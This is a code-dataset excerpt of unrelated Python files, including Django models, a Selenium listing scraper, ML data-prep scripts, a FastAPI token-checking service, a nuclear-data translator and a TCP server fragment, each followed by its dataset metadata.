'TRAGICOMEDIA'\n\n PLAY_GENDER_OPTIONS = (\n (AUTO, 'Auto'),\n (BURLESCO, 'Burlesco'),\n (CIRCENSE, 'Circense'),\n (COMEDIA, 'Comédia'),\n (DRAMA, 'Drama'),\n (FARSA, 'Farsa'),\n (MIMICA, 'Mímica'),\n (MUSICAL, 'Musical'),\n (OUTROS, 'Outros'),\n (TRAGEDIA, 'Tragédia'),\n (TRAGICOMEDIA, 'Tragicomédia'),\n )\n\n synopsis = models.TextField(\n verbose_name=_('Sinopse'),\n help_text=_('Sinopse do Peça'),\n max_length=500,\n default=\"\"\n )\n\n diretor = models.CharField(\n verbose_name=_('Diretor'),\n help_text=_('Diretor do Peça'),\n max_length=255,\n default=\"\"\n )\n\n cast = models.TextField(\n verbose_name=_('Elenco'),\n help_text=_('Elenco participante do Peça'),\n max_length=500,\n default=\"\"\n )\n\n writer = models.CharField(\n verbose_name=_('Escritor'),\n help_text=_('Escritor do Peça'),\n max_length=255,\n default=\"\"\n )\n\n producer = models.CharField(\n verbose_name=_('Produtor'),\n help_text=_('Produtor do Peça'),\n max_length=255,\n default=\"\"\n )\n\n gender = models.CharField(\n verbose_name=_('Genêro'),\n help_text=_('Genêro do Peça'),\n choices=PLAY_GENDER_OPTIONS,\n max_length=15,\n default=OUTROS\n )\n\n def __str__(self):\n return self.spectacle.name\n\n def save(self, force_insert=False, force_update=False, using=None,\n update_fields=None):\n spectacle = Spectacle.objects.get(id=self.spectacle_id)\n self.name = spectacle.name\n self.status = spectacle.status\n if spectacle.poster:\n self.poster = spectacle.poster\n self.duration = spectacle.duration\n self.classification = spectacle.classification\n self.spectacle_type = spectacle.spectacle_type\n super(Play, self).save()\n\n\nclass Show(SpectacleDecorator):\n class Meta:\n verbose_name = _(\"Show\")\n verbose_name_plural = _(\"Shows\")\n\n band = models.CharField(\n verbose_name=_('Banda/Artista'),\n help_text=_('Nome da(o) Banda/Artista'),\n max_length=255,\n default=\"\"\n )\n\n tour = models.CharField(\n verbose_name=_('Turnê'),\n help_text=_('Nome da Turnê'),\n max_length=255,\n default=\"\"\n )\n\n description = models.TextField(\n verbose_name=_('Descrição do Show'),\n help_text=_('Descrição do Show'),\n max_length=500,\n default=\"\"\n )\n\n def __str__(self):\n show_name = self.spectacle.name\n show_band = self.band\n show_tour = self.tour\n\n return '{}: {} - {}'.format(\n show_name,\n show_band,\n show_tour\n )\n\n def save(self, force_insert=False, force_update=False, using=None,\n update_fields=None):\n spectacle = Spectacle.objects.get(id=self.spectacle_id)\n self.name = spectacle.name\n self.status = spectacle.status\n if spectacle.poster:\n self.poster = spectacle.poster\n self.duration = spectacle.duration\n self.classification = spectacle.classification\n self.spectacle_type = spectacle.spectacle_type\n super(Show, self).save()\n","sub_path":"ticketflix/spectacle/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":9801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"345902740","text":"import os\nfrom distutils import dirname\n\nfrom selenium import webdriver\nfrom selenium.webdriver import DesiredCapabilities\nfrom selenium.webdriver.remote.webdriver import WebDriver\n\n\ndef get_driver_instante() -> WebDriver:\n instance = webdriver.Chrome(options=webdriver.ChromeOptions(),\n executable_path=os.path.join(dirname(__file__), \"chromedriver\"),\n desired_capabilities=DesiredCapabilities.CHROME.copy())\n instance.implicitly_wait(2)\n instance.set_window_size(width=1024, height=768)\n return instance\n\n\ndef build_zoompla_url(bed=2, price_max=290000, price_min=240000, radius=1) -> str:\n return \"https://www.zoopla.co.uk/for-sale/houses/london/?\" \\\n \"is_auction=false\" \\\n \"&beds_min={}\" \\\n \"&feature=has_parking_garage\" \\\n \"&is_retirement_home=false\" \\\n \"&is_shared_ownership=false\" \\\n \"&price_max={}\" \\\n \"&price_min={}\" \\\n \"&q=London\" \\\n \"&radius={}\" \\\n \"&results_sort=newest_listings\" \\\n \"&search_source=facets\".format(bed, price_max, price_min, radius)\n\n\ndef write_html_file(source):\n path = os.path.join(dirname(__file__), \"index.html\")\n with open(path, 'w') as file:\n file.write(source)\n file.close()\n\ndef parse_html(result) -> str:\n html = \"\"\n for entry in result:\n html += \"\".format(entry)\n html += \"
{}
\"\n return html\n\n\ndef scrape_zoompla(driver: WebDriver):\n paginator_loc = \"//div[contains(@class, 'paginate')]\"\n page_next_loc = \".//a[text()='Next']\"\n list_loc = \"//ul[contains(@class, 'listing-results')]\"\n list_entry_loc = 'li'\n\n url = build_zoompla_url(bed=2, price_max=290000, price_min=240000)\n print(\"Accessing website: {}\".format(url))\n driver.get(url)\n\n result = []\n\n # First to n-1 page\n while ('Next' in driver.find_element_by_xpath(paginator_loc).text):\n list = driver.find_element_by_xpath(list_loc)\n entries = list.find_elements_by_tag_name(list_entry_loc)\n for entry in entries:\n if entry.text != '':\n result.append(entry.text)\n driver.find_element_by_xpath(paginator_loc).find_element_by_xpath(page_next_loc).click()\n\n # Last page only\n list = driver.find_element_by_xpath(list_loc)\n entries = list.find_elements_by_tag_name(list_entry_loc)\n for entry in entries:\n if entry.text != '':\n result.append(entry.text)\n return result\n\n\nif __name__ == '__main__':\n print(\"Starting scrapper\")\n driver = get_driver_instante()\n try:\n result = scrape_zoompla(driver)\n print(\"Scrapper finished, writing output file\")\n write_html_file(parse_html(result))\n except Exception as e:\n print(\"Failed, writing scrapped HTML page:\\n\" + str(e))\n write_html_file(driver.page_source)\n finally:\n driver.quit()\n","sub_path":"scrapeit.py","file_name":"scrapeit.py","file_ext":"py","file_size_in_byte":2981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"235644019","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n# File: sun09.py\n# Author: Akanksha Saran \n\nimport os\nimport gzip\nimport numpy as np\nfrom six.moves import range, zip, map\nimport cv2\n\nfrom tensorpack.utils import logger\nfrom tensorpack.utils.fs import download, get_dataset_path\nfrom tensorpack.utils.timer import timed_operation\nfrom tensorpack.dataflow.base import RNGDataFlow\n\n__all__ = ['sun09']\n\nclass SUN09(RNGDataFlow):\n \"\"\"\n Produces [image, label] in MNIST dataset,\n image is 28x28 in the range [0,1], label is an int.\n \"\"\"\n\n def __init__(self, pathfile, train_or_test, shuffle=False):\n \"\"\"\n Args:\n train_or_test (str): either 'train' or 'test'\n shuffle (bool): shuffle the dataset\n \"\"\"\n assert os.path.isfile(pathfile)\n assert train_or_test in ['train', 'test']\n self.name = train_or_test\n self.shuffle = shuffle\n\n imgs_labels = [line.rstrip('\\n') for line in open(pathfile,'r')]\n self.imglist = [img_label.split('\\t') for img_label in imgs_labels]\n \n \n self.images = []\n self.labels = []\n idxs = np.arange(len(self.imglist))\n if self.shuffle:\n self.rng.shuffle(idxs)\n for k in idxs:\n #print(self.imglist[k])\n fname, label = self.imglist[k]\n #if int(label)==0:\n # print(fname,label)\n im = cv2.imread(fname, cv2.IMREAD_COLOR)\n assert im is not None, fname\n if im.ndim == 2:\n im = np.expand_dims(im, 2).repeat(3,2)\n im = cv2.resize(im,(224,224))\n self.images.append(im)\n self.labels.append(int(label))\n #print('*****')\n #print(self.images[0].shape)\n\n\n def size(self):\n return len(self.imglist)\n\n def get_data(self):\n idxs = np.arange(len(self.imglist))\n if self.shuffle:\n self.rng.shuffle(idxs)\n\n for k in idxs:\n fname, label = self.imglist[k]\n\n im = cv2.imread(fname, cv2.IMREAD_COLOR)\n assert im is not None, fname\n if im.ndim == 2:\n im = np.expand_dims(im, 2).repeat(3, 2)\n yield [im, int(label)]\n\nif __name__ == '__main__':\n ds = SUN09('/home/asaran/research/tensorpack/examples/SimilarityLearning/data/train.txt', 'train',\n shuffle=False)\n ds.reset_state()\n for k in ds.get_data():\n from IPython import embed\n embed()\n break\n","sub_path":"examples/SimilarityLearning/utils/sun09.py","file_name":"sun09.py","file_ext":"py","file_size_in_byte":2521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"653979620","text":"#encoding:utf-8\nfrom django.db import models\n\nfrom tinymce.models import HTMLField\nimport datetime\n\nclass Categoria(models.Model):\n\tnombre = models.CharField(max_length=16, verbose_name='Nombre de la categoria', help_text='Poner el nombre en minusculas y en singular [se usa para poner en la URL, por ejemplo /chisme, /noticia, /tip, etc] ')\n\n\tdef __str__(self):\n\t\treturn self.nombre\n\nclass Publicacion(models.Model):\n\ttitulo = models.CharField(max_length=48, help_text='Titulo de la publicacion, maximo 48 caracteres')\n\timagen = models.ImageField(upload_to='publicaciones/portadas', verbose_name='Imagen principal', help_text='Da a entender el tipo contenido de la publicacion. Esta aparecera en la pagina principal del sitio si se marca la opcion -En portada- ')\n\tparrafo_principal = models.TextField(max_length=250, help_text='Debe ser preciso y corto (maximo 250 caracteres), aparecera como el texto de enganche para los usuarios')\n\tcuerpo = HTMLField(help_text='Cuerpo principal de la entrada')\n\t#tipo_publicacion = models.CharField(max_length=15, choices=TIPOS_DE_PUBLICACION, default=\"publicacion\")\n\ttipo_publicacion = models.ForeignKey(Categoria)\n\tfecha_creacion = models.DateTimeField(auto_now_add=True)\n\tfecha_publicacion = models.DateTimeField('Fecha de publicacion', help_text='Indica la fecha en la cual la publicacion aparecera automaticamente [Tambien debe estar marcada la opcion \"Listo para publicar para que sea valido\"]')\n\tfecha_expiracion = models.DateTimeField('Fecha de expiracion', help_text='Fecha de vence la promocion/publicacion')\n\t\n\ten_portada = models.BooleanField(default=False, help_text='Debe aparecer en la pagina principal del sitio?')\n\tlisto_para_publicar = models.BooleanField(default=False, help_text='Hasta que no este marcada esta opcion nunca se mostrara esta publicacion')\n\t\n\tdef __str__(self):\n\t\treturn self.titulo","sub_path":"apps/publicaciones/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"611237041","text":"#coding=utf-8\nfrom conf import config\nfrom utils import dateUtils\nfrom log import get_logger\nfrom utils.odps_init import odps_uxin_init\nfrom utils.redisUtils import redisUtils\n# from apscheduler.schedulers.blocking import BlockingScheduler\n\n\n\n\ndef get_hot_list_uid():\n logger = get_logger(\"\")\n # 初始化odps\n odps = odps_uxin_init()\n last_month = dateUtils.get_last_month()\n\n\n # 条件二:上月总付费人数不低于E的主播开播,E=200人(去重)\n fee_num_E_sql=\"\"\"\n select \n uid\n from\n (select \n uid,fee_uid_num\n from\n (select\n uid,\n count(distinct send_id) as fee_uid_num\n from live_account_trans_detail_d \n where app_id = '0' and create_time is not null\n and substr(create_time,1,7) = '%s'\n and (trans_type = 17 or trans_type = 1 or trans_type = 5 or trans_type = 8 or trans_type = 14\n or trans_type = 19 or trans_type = 15 or trans_type = 40)\t\n group by uid)t1\n where fee_uid_num > '%d'\n )tt1\n \"\"\"%(last_month,config.E)\n\n # 条件五:上月收入不低于C的主播开播,C=1w(自然月or最近30天)(C本身只看流水,包含钻石和人民币)\n income_C_sql=\"\"\"\n select\n uid\n from\n (select\n uid,\n sum(diamond + amount) as income\n from live_account_trans_detail_d\n where app_id = '0' and create_time is not null\n and substr(create_time,1,7) = '%s'\n and (trans_type = 17 or trans_type = 1 or trans_type = 5 or trans_type = 8 or trans_type = 14\n or trans_type = 19 or trans_type = 15 or trans_type = 40)\n group by uid)t1\n where income > '%d'\n \"\"\"%(last_month,config.C)\n\n # 条件六:上月总观众数不低于D的主播开播,D=5k(天与天不去重)\n viewer_num_D_sql=\"\"\"\n select \n anchor_uid as uid\n from\n (select \n anchor_uid,viewer_num\n from\n (select \n cast (anchor_uid as bigint) as anchor_uid,\n sum(viewer_num) as viewer_num \n from\n (select \n anchor_uid,\n dt,\n count(distinct uid) as viewer_num\n from uxin_db_bc.bds_live_room_uid_view_info_d \n where substr(dt,1,7) = '%s'\n group by anchor_uid,dt)t1\n group by anchor_uid)tt1\n where viewer_num > '%d')tt1\n \"\"\"%(last_month,config.D)\n\n logger.info(\"要执行的付费人数为门槛的sql \"+fee_num_E_sql)\n logger.info(\"要执行的收入为门槛的sql \" + income_C_sql)\n logger.info(\"要执行的观看人数为门槛的sql \" + viewer_num_D_sql)\n\n # 异步方式执行\n instance_fee_num = odps.run_sql(fee_num_E_sql)\n # 获取日志地址\n logview_fee_num = instance_fee_num.get_logview_address()\n logger.info(logview_fee_num)\n\n instance_income = odps.run_sql(income_C_sql)\n logview_income = instance_income.get_logview_address()\n logger.info(logview_income)\n\n instance_viewer_num = odps.run_sql(viewer_num_D_sql)\n logview_viewer_num = instance_viewer_num.get_logview_address()\n logger.info(logview_viewer_num)\n\n # 阻塞直到完成\n instance_fee_num.wait_for_success()\n instance_income.wait_for_success()\n instance_viewer_num.wait_for_success()\n\n # 获得付费人数为门槛的sql的结果\n fee_num_uid_list = set()\n if (instance_fee_num.is_successful()):\n logger.info(\"付费人数限为门槛的sql执行成功!\")\n with instance_fee_num.open_reader() as reader:\n for record in reader:\n fee_num_uid_list.add(dict(record)[\"uid\"])\n logger.info(\"付费人数限为门槛的sql执行结果为%d条记录!\"%(len(fee_num_uid_list)))\n else:\n logger.info(\"付费人数限为门槛的sql执行失败!\")\n\n\n # 获得收入为门槛的sql的结果\n income_uid_list = set()\n if (instance_income.is_successful()):\n logger.info(\"收入限为门槛的sql执行成功!\")\n with instance_income.open_reader() as reader:\n for record in reader:\n income_uid_list.add(dict(record)[\"uid\"])\n logger.info(\"收入限为门槛的sql执行结果为%d条记录!\" % (len(income_uid_list)))\n else:\n logger.info(\"收入限为门槛的sql执行失败!\")\n\n\n viewer_num_uid_list = set()\n if (instance_viewer_num.is_successful()):\n logger.info(\"观众数限为门槛的sql执行成功!\")\n with instance_viewer_num.open_reader() as reader:\n for record in reader:\n viewer_num_uid_list.add(dict(record)[\"uid\"])\n logger.info(\"观众数限为门槛的sql执行结果为%d条记录!\" % (len(viewer_num_uid_list)))\n else:\n logger.info(\"观众数限为门槛的sql执行失败!\")\n\n return fee_num_uid_list,income_uid_list,viewer_num_uid_list\n\n\ndef insert2redis():\n fee_num_uid_list, income_uid_list, viewer_num_uid_list = get_hot_list_uid()\n redisutil = redisUtils()\n for uid in fee_num_uid_list:\n redisutil.sadd(config.fee_uid_key,uid)\n for uid in income_uid_list:\n redisutil.sadd(config.income_key,uid)\n for uid in viewer_num_uid_list:\n redisutil.sadd(config.viewer_key,uid)\n\n\n\n\nif __name__ == \"__main__\":\n # scheduler = BlockingScheduler()\n # # scheduler.add_job(insert2redis, \"cron\", day = 19,hour = 15) ##每天正点执行\n # scheduler.add_job(insert2redis, 'interval', minutes = 1) ## 一分钟间隔执行\n # scheduler.start()\n insert2redis()\n","sub_path":"hot_live_anchor/hot_list_anchor.py","file_name":"hot_list_anchor.py","file_ext":"py","file_size_in_byte":5391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"463092919","text":"# -*- coding: utf-8 -*- \n# @Time : 2021/1/4 13:52 \n# @Author : 张丽雯 \n# @File : test_Declarationcase.py \n# @中文描述 : 生产声明\n\nimport sys\nimport pytest\nfrom DataApp.WodeclarationData import *\nfrom src.pageobjectAPP.pageWodeclaration import *\nfrom src.public.common.Close_current_tab import *\nfrom src.public.common.Search_Item import *\n\n\nclass Test_Declarat:\n def setup_class(self):\n app_login(username, password)\n login_Declaration()\n\n def teardown_class(self):\n Close_current_tab()\n app_logout()\n\n # 选择要声明的工单\n def test_wo_search(self):\n log.info(\"开始执行用例%s\" % sys._getframe().f_code.co_name)\n search_item('编码','WO00000065')\n assert new_page_source('WO00000065')\n # 生产声明\n def test_Declaration(self):\n log.info(\"开始执行用例%s\" % sys._getframe().f_code.co_name)\n declaration(num, Cnumber)\n sleep(10)\n # assert \"保存成功\" in new_get_text(alert_txt)\n","sub_path":"TestcaseApp/Workorder/test_wodeclaration.py","file_name":"test_wodeclaration.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"290048148","text":"from math import sqrt\nfrom scipy import stats\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nfrom pydataset import data\nimport statistics\nimport acquire\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.impute import KNNImputer\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n\n\ndef clean_iris(df):\n df = df.drop(columns = ['species_id'])\n df = df.rename(columns={\"species_name\": \"species\"})\n df_dummy = pd.get_dummies(df['species'], drop_first=True)\n df= pd.concat([df, df_dummy], axis = 1)\n return df\n\ndef split_iris_data(df):\n \"\"\"\n splits the data in train validate and test \n \"\"\"\n train, test = train_test_split(df, test_size = 0.2, random_state = 123, stratify = df.species)\n train, validate = train_test_split(train, test_size=.3, random_state=123, stratify=train.species)\n \n return train, validate, test\n\ndef prep_irs_data(df):\n \"\"\"\n takes in a data from titanic database, cleans the data, splits the data\n in train validate test and imputes the missing values for embark_town. \n Returns three dataframes train, validate and test.\n \"\"\"\n df = clean_iris(df)\n train, validate, test = split_iris_data(df)\n #train, validate, test = impute_mode(train, validate, test) #nothing to impute\n return train, validate, test\n\n\n\ndef clean_telco(df):\n\n df = acquire.get_telco_data() # grabbing the telco data\n df = df.drop_duplicates() # Dropping Duplicates\n df = df.drop(columns = ['customer_id']) # Don't need this column\n \n # If total charges are null, then remove the entire row \n list_of_null_indexs = list(df[df.total_charges.str.contains(\" \")].index)\n df = df.drop(list_of_null_indexs)\n \n # Convert total_charges from datatype object to float\n total_charges = df.total_charges.astype(\"float\")\n df = df.drop(columns='total_charges')\n df = pd.concat([df, total_charges], axis = 1)\n \n # In the three lines below are mapping out the current values for what they actually represent.\n payment = df.payment_type_id.map({1: 'Electronic check', 2: 'Mailed check', 3:'Bank transder', 4:'Credit card'})\n internet = df.internet_service_type_id.map({1: 'DSL', 2: 'Fiber optic', 3:'None'})\n contract = df.contract_type_id .map({1: 'Month-to-month', 2: 'One year', 3:'Two year'})\n \n # In the three lines below im adding each series to my dataframe and renaming the columns\n df = pd.concat([df, payment.rename(\"payment\")], axis = 1)\n df = pd.concat([df, internet.rename(\"internet_service\")], axis = 1)\n df = pd.concat([df, contract.rename(\"contract\")], axis = 1)\n \n df = df.drop(columns=['payment_type_id','contract_type_id', 'internet_service_type_id']) # Dropping old columns\n \n boolean = df.nunique()[df.nunique() <= 2].index # boolean is a list of columns who's values are either true/false or 1/0\n\n # In the line below, I am making dummies for all the boolean columns. Dropping the first so I dont get two columns back\n boolean_dummy = pd.get_dummies(df[boolean], drop_first=[True, True, True, True, True, True, True])\n \n \n df = pd.concat([df, boolean_dummy], axis = 1) # Adding my encoded boolean_dummy DataFrame back to my original Data Frame\n df = df.drop(columns=boolean) # Dropping the none encoded columns\n \n # In the line below, I am grabbing all the categorical columns(that are greater than 2) and saving the values into categ as a list\n categ = df.nunique()[(df.nunique() > 2) & (df.nunique() < 5)].index\n categ_dummy = pd.get_dummies(df[categ]) # Grabbing dummies, this time dont drop the first columns.\n \n \n df = pd.concat([df, categ_dummy], axis = 1) # Adding my encoded categ_dummy DataFrame back to my original Data Frame\n df = df.drop(columns=categ) # Dropping the none encoded columns\n \n df = df.rename(columns={'churn_Yes': 'churn'})\n return df\n\ndef split_telco_data(df):\n \n train, test = train_test_split(df, test_size = 0.2, random_state = 123, stratify = df.churn)\n train, validate = train_test_split(train, test_size=.3, random_state=123, stratify=train.churn)\n \n return train, validate, test\n\ndef prep_telco_data(df):\n \"\"\"\n takes in a data from titanic database, cleans the data, splits the data\n in train validate test and imputes the missing values for embark_town. \n Returns three dataframes train, validate and test.\n \"\"\"\n df = clean_telco(df)\n train, validate, test = split_telco_data(df)\n #train, validate, test = impute_mode(train, validate, test) #nothing to impute no missing values\n return train, validate, test\n\n############## Titanic ##################\n\ndef clean_titanic(df):\n '''\n This function will drop any duplicate observations, \n drop columns not needed, fill missing embarktown with 'Southampton'\n and create dummy vars of sex and embark_town. \n '''\n df.drop_duplicates(inplace=True)\n df.drop(columns=['deck', 'embarked', 'class'], inplace=True)\n df.embark_town.fillna(value='Southampton', inplace=True)\n dummy_df = pd.get_dummies(df[['sex', 'embark_town']], drop_first=False)\n df = df.drop(columns=['passenger_id'])\n return pd.concat([df, dummy_df], axis=1)\n\n\ndef split_titanic_data(df):\n \"\"\"\n splits the data in train validate and test \n \"\"\"\n train, test = train_test_split(df, test_size = 0.2, random_state = 123, stratify = df.survived)\n train, validate = train_test_split(train, test_size=.25, random_state=123, stratify=train.survived)\n \n return train, validate, test\n\ndef impute_mode(train, validate, test):\n '''\n impute mode for embark_town\n '''\n \n imputer = KNNImputer(n_neighbors=2)\n train[['age']] = imputer.fit_transform(train[['age']])\n validate[['age']] = imputer.fit_transform(validate[['age']])\n test[['age']] = imputer.fit_transform(test[['age']])\n\n imputer = SimpleImputer(strategy='most_frequent')\n train[['embark_town']] = imputer.fit_transform(train[['embark_town']])\n validate[['embark_town']] = imputer.transform(validate[['embark_town']])\n test[['embark_town']] = imputer.transform(test[['embark_town']])\n return train, validate, test\n\ndef prep_titanic_data(df):\n \"\"\"\n takes in a data from titanic database, cleans the data, splits the data\n in train validate test and imputes the missing values for embark_town. \n Returns three dataframes train, validate and test.\n \"\"\"\n df = clean_titanic(df)\n train, validate, test = split_titanic_data(df)\n train, validate, test = impute_mode(train, validate, test)\n\n #last min clean ups\n train.drop(columns=['sex', 'embark_town', 'sex_female'], inplace=True)\n validate.drop(columns=['sex', 'embark_town', 'sex_female'], inplace=True)\n test.drop(columns=['sex', 'embark_town', 'sex_female'], inplace=True)\n return train, validate, test","sub_path":"prepare.py","file_name":"prepare.py","file_ext":"py","file_size_in_byte":6900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"87888559","text":"bedrag = int(input('Geef bedrag tussen 0 en 500 eurocent: '))\nbetaling = ''\nrestbedrag = bedrag\n\nfor munt in 200, 100, 50, 20, 10, 5, 2, 1:\n aantal = restbedrag // munt\n restbedrag = restbedrag % munt\n\n if aantal > 0:\n betaling = betaling + str(aantal) + ' x ' + str(munt) + '\\n'\n\nprint(betaling)\n","sub_path":"Opdrachten/Opdracht5.py","file_name":"Opdracht5.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"640026208","text":"#! /usr/bin/env python\n\n# <>\n# Copyright (c) 2016, Lawrence Livermore National Security, LLC.\n# Produced at the Lawrence Livermore National Laboratory.\n# Written by the LLNL Nuclear Data and Theory group\n# (email: mattoon1@llnl.gov)\n# LLNL-CODE-683960.\n# All rights reserved.\n# \n# This file is part of the FUDGE package (For Updating Data and \n# Generating Evaluations)\n# \n# When citing FUDGE, please use the following reference:\n# C.M. Mattoon, B.R. Beck, N.R. Patel, N.C. Summers, G.W. Hedstrom, D.A. Brown, \"Generalized Nuclear Data: A New Structure (with Supporting Infrastructure) for Handling Nuclear Data\", Nuclear Data Sheets, Volume 113, Issue 12, December 2012, Pages 3145-3171, ISSN 0090-3752, http://dx.doi.org/10. 1016/j.nds.2012.11.008\n# \n# \n# Please also read this link - Our Notice and Modified BSD License\n# \n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n# * Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the disclaimer below.\n# * Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the disclaimer (as noted below) in the\n# documentation and/or other materials provided with the distribution.\n# * Neither the name of LLNS/LLNL nor the names of its contributors may be used\n# to endorse or promote products derived from this software without specific\n# prior written permission.\n# \n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND\n# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL LAWRENCE LIVERMORE NATIONAL SECURITY, LLC,\n# THE U.S. DEPARTMENT OF ENERGY OR CONTRIBUTORS BE LIABLE FOR ANY\n# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\n# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND\n# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n# \n# \n# Additional BSD Notice\n# \n# 1. This notice is required to be provided under our contract with the U.S.\n# Department of Energy (DOE). This work was produced at Lawrence Livermore\n# National Laboratory under Contract No. DE-AC52-07NA27344 with the DOE.\n# \n# 2. Neither the United States Government nor Lawrence Livermore National Security,\n# LLC nor any of their employees, makes any warranty, express or implied, or assumes\n# any liability or responsibility for the accuracy, completeness, or usefulness of any\n# information, apparatus, product, or process disclosed, or represents that its use\n# would not infringe privately-owned rights.\n# \n# 3. Also, reference herein to any specific commercial products, process, or services\n# by trade name, trademark, manufacturer or otherwise does not necessarily constitute\n# or imply its endorsement, recommendation, or favoring by the United States Government\n# or Lawrence Livermore National Security, LLC. The views and opinions of authors expressed\n# herein do not necessarily state or reflect those of the United States Government or\n# Lawrence Livermore National Security, LLC, and shall not be used for advertising or\n# product endorsement purposes.\n# \n# <>\nimport os\nfrom fudge.legacy.endl import endlProject\nimport site_packages.legacy.toENDF6.toENDF6 # adds 'toENDF6' methods to GND classes\n\nimport argparse\nparser = argparse.ArgumentParser( description = \"Translate ENDL evaluations into GND, and optionally also ENDF-6.\" )\nparser.add_argument( 'ZA', type = str, help = \"za of target to translate\" )\nparser.add_argument( '-l', '--library', default = 'endl2011.0',\n help = \"ENDL library (default=endl2011.0). May be full path or identifier\" )\nparser.add_argument( '-p', '--projectile', default = 'n',\n help = \"Choose projectile (default='n'). May be string or yi number\" )\nparser.add_argument( '-6', '--toENDF6', action = 'store_true',\n help = \"After creating GND, also translate to ENDF-6\" )\nparser.add_argument( '-v', '--version', default = '1.0.0',\n help = \"Evaluation version number. Should be of form 'major.minor.patchlevel' (i.e. 2011.0.1)\" )\n\nif( __name__ == '__main__' ) :\n\n args = parser.parse_args( )\n\n e = endlProject( args.library, projectile = args.projectile, readOnly = True )\n\n za = e.readZA( args.ZA )\n za.read ()\n r = za.toGND( evaluationLibrary = os.path.basename( args.library ), evaluationVersion = args.version )\n r.saveToFile( \"endl2gnd.xml\" )\n\n if( args.toENDF6 ) :\n with open( \"endl2gnd.endf\", \"w\" ) as fout :\n fout.write( r.toENDF6( style = \"eval\", flags = { 'verbosity' : 32 } ) )\n","sub_path":"site_packages/LLNL/ENDL2gnd.py","file_name":"ENDL2gnd.py","file_ext":"py","file_size_in_byte":5082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"220286137","text":"from os import getenv\nfrom typing import Optional\n\nimport requests\nimport uvicorn\nfrom fastapi import Depends, FastAPI, Request\nfrom fastapi.exceptions import HTTPException\nfrom fastapi.responses import RedirectResponse\nfrom pydantic import BaseModel\n\nAUTH_URI = getenv(key=\"AUTH_URI\", default=\"localhost\")\nAUTH_PORT = getenv(key=\"AUTH_PORT\", default=\"5000\")\n\n\nclass User(BaseModel):\n username: str\n email: Optional[str] = None\n full_name: Optional[str] = None\n\n\nresource_api = FastAPI()\n\n\nasync def get_current_user(token: str):\n response = requests.get(url=AUTH_URI + ':' + AUTH_PORT + '/user_info', headers={\"Authorization\": \"Bearer \" + token})\n if response.status_code != 200:\n raise HTTPException(status_code=response.status_code, detail=response.content.decode())\n return response.content.decode()\n\n\nasync def check_auth(request: Request):\n authorization: str = request.headers.get(\"Authorization\")\n if not authorization:\n raise HTTPException(status_code=401, detail=\"Not authenticated\")\n token_type, _, token = authorization.partition(\" \")\n if token_type.lower() != \"bearer\":\n raise HTTPException(status_code=401, detail=\"Invalid Authorization header\")\n return token\n\n\nasync def check_access(roles, token=Depends(check_auth)):\n request_body = {\n \"token_type\": \"Bearer\",\n \"token\": token,\n \"roles_acceptable\": roles\n }\n response = requests.post(\n url='http://auth:5000/check_access',\n data=request_body\n )\n if response.status_code == 200:\n return True\n elif response.status_code == 403:\n return False\n else:\n return response\n\n\n@resource_api.get(\"/user_page\")\nasync def read_users_me(token=Depends(check_auth)):\n current_user = await get_current_user(token)\n return current_user\n\n\n@resource_api.get(\"/\")\nasync def redirect_home():\n return RedirectResponse(url=\"/homepage\")\n\n\n@resource_api.get(\"/homepage\")\nasync def homepage():\n return \"Welcome to Auth Testing app\"\n\n\n@resource_api.get(\"/restricted_resource\")\nasync def restricted():\n access = check_access(roles=[], token=Depends(check_auth))\n if not isinstance(access, bool):\n return access\n if access:\n return \"Some private info\"\n else:\n return 403\n\n\nif __name__ == '__main__':\n uvicorn.run(\n 'main:resource_api',\n host='0.0.0.0',\n port=8000,\n )\n","sub_path":"resource/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"147910101","text":"from threading import Thread\nimport socket\n\n\ndef handle_tcp(s):\n s.listen(1)\n while True:\n client_socket, address = s.accept()\n print(\"Connection incoming from {}\".format(address))\n Thread(target=handle_tcp_client, args=(client_socket, )).start()\n\n\ndef handle_tcp_client(conn):\n while True:\n 